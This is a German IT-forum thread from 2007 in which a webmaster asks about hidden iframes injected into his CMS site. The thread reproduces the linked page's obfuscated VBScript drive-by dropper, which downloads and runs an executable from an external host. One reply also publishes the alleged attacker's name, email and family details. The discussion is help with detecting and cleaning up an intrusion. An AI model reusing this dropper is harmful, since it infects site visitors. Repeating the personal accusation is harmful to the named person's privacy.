Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Homepage gehackt wurden?

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Casanitto

Casanitto (Level 1) - Jetzt verbinden

08.09.2007, aktualisiert 09.09.2007, 4195 Aufrufe, 2 Kommentare

Hallo,

Seit heute kann ich mich nicht mehr in meine Homepage einloggen, benutze Webspell als CMS.
Er sagt mir zwar das ich korrekt eingeloggt bin, abba dann bei der nächsten Seite sagt er das ich eingeloggt sein muss um die Webseite zusehen!
Habe dann mal geschaut im Quelltext und da steht dann das hier:

01.
 <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
02.
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
03.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Das ist aber nicht von mir!
Wenn man diese Webseite aufruft kommt folgendes :
01.
<script language="JavaScript"> 
02.
<!-- 
03.
 
04.
function SymError() 
05.
06.
  return true; 
07.
08.
 
09.
window.onerror = SymError; 
10.
 
11.
var SymRealWinOpen = window.open; 
12.
 
13.
function SymWinOpen(url, name, attributes) 
14.
15.
  return (new Object()); 
16.
17.
 
18.
window.open = SymWinOpen; 
19.
 
20.
//--> 
21.
</script> 
22.
 
23.
<script language="JavaScript"> 
24.
<!-- 
25.
 
26.
function SymError() 
27.
28.
  return true; 
29.
30.
 
31.
window.onerror = SymError; 
32.
 
33.
var SymRealWinOpen = window.open; 
34.
 
35.
function SymWinOpen(url, name, attributes) 
36.
37.
  return (new Object()); 
38.
39.
 
40.
window.open = SymWinOpen; 
41.
 
42.
//--> 
43.
</script> 
44.
 
45.
<SCRIPT LANGUAGE="VBS"><!-- 
46.
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu" 
47.
s="" 
48.
For i=1 To Len(d) 
49.
b=Mid(d,i,1) 
50.
a=Asc(b) 
51.
If a=1 Then a=9 
52.
If a=2 Then a=10 
53.
If a=3 Then a=13 
54.
If a=4 Then a=34 
55.
If a<=31 And a>=14 Then 
56.
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4) 
57.
i=i+2 
58.
Else 
59.
if a>=41 and a<=127 then a=a-1 
60.
if a <127 then s=s+Chr(a) else s=s+b 
61.
End If 
62.
Next 
63.
document.write s 
64.
 
65.
--></SCRIPT> 
66.
<script language="JavaScript"> 
67.
<!-- 
68.
var SymRealOnLoad; 
69.
var SymRealOnUnload; 
70.
 
71.
function SymOnUnload() 
72.
73.
  window.open = SymWinOpen; 
74.
  if(SymRealOnUnload != null) 
75.
     SymRealOnUnload(); 
76.
77.
 
78.
function SymOnLoad() 
79.
80.
  if(SymRealOnLoad != null) 
81.
     SymRealOnLoad(); 
82.
  window.open = SymRealWinOpen; 
83.
  SymRealOnUnload = window.onunload; 
84.
  window.onunload = SymOnUnload; 
85.
86.
 
87.
SymRealOnLoad = window.onload; 
88.
window.onload = SymOnLoad; 
89.
 
90.
//--> 
91.
</script> 
92.
 
93.
 
94.
<script language="JavaScript"> 
95.
<!-- 
96.
var SymRealOnLoad; 
97.
var SymRealOnUnload; 
98.
 
99.
function SymOnUnload() 
100.
101.
  window.open = SymWinOpen; 
102.
  if(SymRealOnUnload != null) 
103.
     SymRealOnUnload(); 
104.
105.
 
106.
function SymOnLoad() 
107.
108.
  if(SymRealOnLoad != null) 
109.
     SymRealOnLoad(); 
110.
  window.open = SymRealWinOpen; 
111.
  SymRealOnUnload = window.onunload; 
112.
  window.onunload = SymOnUnload; 
113.
114.
 
115.
SymRealOnLoad = window.onload; 
116.
window.onload = SymOnLoad; 
117.
 
118.
//--> 
119.
</script>
Kann mir von euch vielleicht jemand sagen was das sein soll?

Gruss Casanitto
Mitglied: thekingofqueens
08.09.2007 um 22:27 Uhr
Provider informieren, Backup des Contents machen, alles löschen und von vorne anfangen.
Bitte warten ..
Mitglied: gnarff
09.09.2007 um 02:09 Uhr
Zu den Codesnippet:
1: Ein Scriptblocker
2. Geblockt wurde folgendes Script:
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Wenn Du wissen willst was Alvarez auf Deiner HP wollte oder dich gar beschweren moechtest, so kannst Du das direkt bei Ihm tun alvarezluque@arnet.com.ar, sein Vater ist Sekretaer des Rotary Clubs in Corrientes, Argentinien, sein voller Name ist Augusto Alvarez Luque, Dipl. Informatiker,
saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Rechtliche Fragen
gelöst Microsoftkonto wurde gehackt - Liegt das Problem direkt bei Microsoft? (7)

Frage von Stefan007 zum Thema Rechtliche Fragen ...

Webentwicklung
gelöst Aktuellen Mitarbeiter auf Homepage anzeigen (15)

Frage von alemanne21 zum Thema Webentwicklung ...

Hosting & Housing
gelöst Homepage über IP-Adresse nicht aufrufbar (14)

Frage von Coreknabe zum Thema Hosting & Housing ...

Batch & Shell
Daten von Homepage automatisiert herunterladen (1)

Frage von Mr.Error zum Thema Batch & Shell ...

Neue Wissensbeiträge
Windows Update

Microsoft Update KB4034664 verursacht Probleme mit Multimonitor-Systemen

(2)

Tipp von beidermachtvongreyscull zum Thema Windows Update ...

Viren und Trojaner

CNC-Fräsen von MECANUMERIC werden (ggf.) mit Viren, Trojanern, Würmern ausgeliefert

(4)

Erfahrungsbericht von anteNope zum Thema Viren und Trojaner ...

Windows 10

Windows 10: Erste Anmeldung Animation deaktivieren

(3)

Anleitung von alemanne21 zum Thema Windows 10 ...

Heiß diskutierte Inhalte
Netzwerkprotokolle
gelöst Leiten "dumme" Switches VLAN-Tags mit durch? (26)

Frage von coltseavers zum Thema Netzwerkprotokolle ...

Netzwerkgrundlagen
Kann auf Freigabe nicht Zugreifen (16)

Frage von leon123 zum Thema Netzwerkgrundlagen ...

Windows Server
gelöst Neues KB für W10 1607 und W2K16 wieder mal nicht im WSUS 3.0, hat das noch jemand? (16)

Frage von departure69 zum Thema Windows Server ...

Router & Routing
FTTH bzw FTTB Router (13)

Frage von ukulele-7 zum Thema Router & Routing ...